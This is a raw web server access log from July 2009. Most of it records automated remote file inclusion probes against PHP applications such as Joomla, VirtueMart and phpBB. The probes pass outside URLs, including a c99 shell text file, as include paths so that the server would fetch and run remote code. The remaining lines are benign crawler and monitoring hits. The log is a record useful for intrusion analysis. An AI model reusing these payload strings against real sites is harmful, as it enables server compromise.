219.85.63.226 - - [20/Jul/2009:02:16:43 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:44 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:48 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:48 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:48 -0400] "GET /logs/access_log.Q109070200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:49 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:49 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:16:49 -0400] "GET /logs/access_log.Q109070200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:17:01 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:17:06 -0400] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:17:06 -0400] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:17:08 -0400] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:17:10 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:17:15 -0400] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:17:17 -0400] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:17:21 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:17:21 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
219.85.63.226 - - [20/Jul/2009:02:17:46 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:02:20:01 -0400] "GET //credits.html/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:02:20:01 -0400] "GET /logs//credits.html/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:02:20:01 -0400] "GET /logs/access_log.Q109070400//credits.html/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:02:20:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.206.99.238 - - [20/Jul/2009:02:20:12 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
195.206.99.238 - - [20/Jul/2009:02:20:12 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 207 "-" "libwww-perl/5.76"
195.206.99.238 - - [20/Jul/2009:02:20:13 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 212 "-" "libwww-perl/5.76"
123.242.165.138 - - [20/Jul/2009:02:20:38 -0400] "GET //credits.html/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:02:20:38 -0400] "GET /logs//credits.html/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:02:20:38 -0400] "GET /logs/access_log.Q109070400//credits.html/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
38.99.44.103 - - [20/Jul/2009:02:20:43 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
123.242.165.138 - - [20/Jul/2009:02:20:46 -0400] "GET /logs//credits.html/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:02:20:46 -0400] "GET //credits.html/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:02:20:46 -0400] "GET /logs/access_log.Q109070400%20%20//credits.html/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
38.99.13.118 - - [20/Jul/2009:02:20:58 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
195.186.64.207 - - [20/Jul/2009:02:21:05 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 231 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:02:21:05 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 226 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:02:21:20 -0400] "GET /logs/access_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:02:21:38 -0400] "GET /logs/access_log.Q109062400%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:02:21:54 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 226 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:02:21:55 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 231 "-" "Mozilla/5.0"
195.206.99.238 - - [20/Jul/2009:02:21:56 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 207 "-" "libwww-perl/5.76"
195.186.64.207 - - [20/Jul/2009:02:21:59 -0400] "GET /logs/access_log.Q109070100%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
218.145.31.242 - - [20/Jul/2009:02:22:05 -0400] "GET /logs/access_log.Q109061500//includes/kb_constants.php?module_root_path=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
218.145.31.242 - - [20/Jul/2009:02:22:05 -0400] "GET //includes/kb_constants.php?module_root_path=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
218.145.31.242 - - [20/Jul/2009:02:22:05 -0400] "GET /logs//includes/kb_constants.php?module_root_path=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
195.186.64.207 - - [20/Jul/2009:02:22:10 -0400] "GET /logs/access_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
218.145.31.242 - - [20/Jul/2009:02:22:10 -0400] "GET //includes/kb_constants.php?module_root_path=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
218.145.31.242 - - [20/Jul/2009:02:22:10 -0400] "GET /logs/access_log.Q109061500//includes/kb_constants.php?module_root_path=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
218.145.31.242 - - [20/Jul/2009:02:22:11 -0400] "GET /logs//includes/kb_constants.php?module_root_path=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
195.186.64.207 - - [20/Jul/2009:02:22:28 -0400] "GET /logs/access_log.Q109062400%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:02:22:50 -0400] "GET /logs/access_log.Q109070100%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
195.206.99.238 - - [20/Jul/2009:02:23:10 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
195.186.64.207 - - [20/Jul/2009:02:23:14 -0400] "GET /logs/access_log.Q109070200%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
67.15.177.55 - - [20/Jul/2009:02:23:31 -0400] "GET /logs//index.php?pag=http://www.sexcam-tv.de/cache/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.15.177.55 - - [20/Jul/2009:02:23:31 -0400] "GET //index.php?pag=http://www.sexcam-tv.de/cache/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.15.177.55 - - [20/Jul/2009:02:23:31 -0400] "GET /logs/access_log.Q109060500%20%20//index.php?pag=http://www.sexcam-tv.de/cache/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.145.92 - - [20/Jul/2009:02:23:57 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:02:23:57 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:02:23:57 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
200.204.51.161 - - [20/Jul/2009:02:24:00 -0400] "GET /logs/error_log.Q109050700//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.robertobirindelli.com.br/adm/scripts/c99.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
200.204.51.161 - - [20/Jul/2009:02:24:00 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.robertobirindelli.com.br/adm/scripts/c99.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
195.186.64.207 - - [20/Jul/2009:02:24:02 -0400] "GET /logs/access_log.Q109070200%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 255 "-" "Mozilla/5.0"
200.204.51.161 - - [20/Jul/2009:02:24:05 -0400] "GET /logs/access_log.Q109060500//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.robertobirindelli.com.br/adm/scripts/c99.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
110.45.145.92 - - [20/Jul/2009:02:24:15 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
67.15.177.55 - - [20/Jul/2009:02:24:25 -0400] "GET /logs/access_log.Q109070500%20%20//index.php?pag=http://www.sexcam-tv.de/cache/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.68.70 - - [20/Jul/2009:02:25:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01911E4E5194E0007E02061+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [20/Jul/2009:02:25:32 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [20/Jul/2009:02:25:32 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01911E4E5174F0007A02061+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [20/Jul/2009:02:25:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0140234F5334A1008B7201P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [20/Jul/2009:02:25:51 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0140234F5314A100807201P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [20/Jul/2009:02:25:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.145.31.242 - - [20/Jul/2009:02:27:23 -0400] "GET /logs/error_log.Q109061500%20//includes/kb_constants.php?module_root_path=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
218.145.31.242 - - [20/Jul/2009:02:27:27 -0400] "GET /logs/error_log.Q109061500%20//includes/kb_constants.php?module_root_path=http://2006.aninite.at/mambots/perkosa.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
65.55.105.232 - - [20/Jul/2009:02:27:33 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.232 - - [20/Jul/2009:02:27:33 -0400] "GET /logs/access_log.Q107110700 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
118.45.190.166 - - [20/Jul/2009:02:28:51 -0400] "GET //?path%5Bdocroot%5D=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:28:53 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:28:53 -0400] "GET /logs//?path%5Bdocroot%5D=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 200 10267 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:29:31 -0400] "GET /logs/access_log.Q109070500%20%20//errors.php?error=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:29:31 -0400] "GET /logs/access_log.Q109062100%20%20//errors.php?error=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:29:58 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:02:30:16 -0400] "GET ///vwar/backup/errors.php?error=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:02:30:16 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:02:30:16 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:02:30:50 -0400] "GET /logs/access_log.Q109061700%20%20///vwar/backup/errors.php?error=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:02:30:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.248.88.155 - - [20/Jul/2009:02:31:01 -0400] "GET /logs/access_log.Q109051500//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://dwno.or.kr/bbs/zipcode/tes? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
125.248.88.155 - - [20/Jul/2009:02:31:01 -0400] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://dwno.or.kr/bbs/zipcode/tes? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.248.88.155 - - [20/Jul/2009:02:31:01 -0400] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://dwno.or.kr/bbs/zipcode/tes? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
125.248.88.155 - - [20/Jul/2009:02:31:01 -0400] "GET /logs/access_log.Q109051600//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://dwno.or.kr/bbs/zipcode/tes? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:02:31:45 -0400] "GET ///vwar/backup/errors.php?error=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:02:31:45 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:02:31:45 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:02:32:23 -0400] "GET /logs/access_log.Q109061700%20%20///vwar/backup/errors.php?error=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
210.205.57.2 - - [20/Jul/2009:02:33:57 -0400] "GET /logs///bbs/skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.205.57.2 - - [20/Jul/2009:02:33:57 -0400] "GET ///bbs/skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.205.57.2 - - [20/Jul/2009:02:33:57 -0400] "GET /logs/error_log.Q109071400///bbs/skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.205.57.2 - - [20/Jul/2009:02:33:57 -0400] "GET /logs/access_log.Q109071500///bbs/skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.68.247 - - [20/Jul/2009:02:35:09 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01911E4E50D410007A02061+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.205.57.2 - - [20/Jul/2009:02:35:56 -0400] "GET /logs/access_log.Q109071500%20%20///bbs/skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:02:35:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.205.57.2 - - [20/Jul/2009:02:36:05 -0400] "GET /logs/error_log.Q109071400%20%20///bbs/skin/ggambo7002_board/write.php?dir=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:36:06 -0400] "GET //?path%5Bdocroot%5D=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:36:06 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:36:06 -0400] "GET /logs//?path%5Bdocroot%5D=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 200 10267 "-" "Mozilla/5.0"
125.248.88.155 - - [20/Jul/2009:02:36:16 -0400] "GET /logs/access_log.Q109051500%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://dwno.or.kr/bbs/zipcode/tes? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
125.248.88.155 - - [20/Jul/2009:02:36:21 -0400] "GET /logs/access_log.Q109051600%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://dwno.or.kr/bbs/zipcode/tes? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
118.45.190.166 - - [20/Jul/2009:02:36:24 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://hongfuqitian.com/m1.gif??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.15.177.55 - - [20/Jul/2009:02:36:26 -0400] "GET /logs/access_log.Q109060500//index.php?pag=http://www.sexcam-tv.de/cache/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:36:33 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:36:34 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:36:34 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
67.15.177.55 - - [20/Jul/2009:02:36:38 -0400] "GET /logs/access_log.Q109070500//index.php?pag=http://www.sexcam-tv.de/cache/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:36:40 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:36:40 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:36:40 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:36:58 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:37:01 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:37:01 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:37:01 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:37:02 -0400] "GET /logs/access_log.Q109070200//include/bbs.lib.inc.php?site_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:02:37:22 -0400] "GET /logs/access_log.Q109070200%20%20//include/bbs.lib.inc.php?site_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.227.249.185 - - [20/Jul/2009:02:37:55 -0400] "GET /logs/access_log.Q109050700%20%20/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.sks75.rj.pl/media/php.txt????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.227.249.185 - - [20/Jul/2009:02:37:55 -0400] "GET /phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.sks75.rj.pl/media/php.txt????? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:37:57 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:37:58 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:02:37:58 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
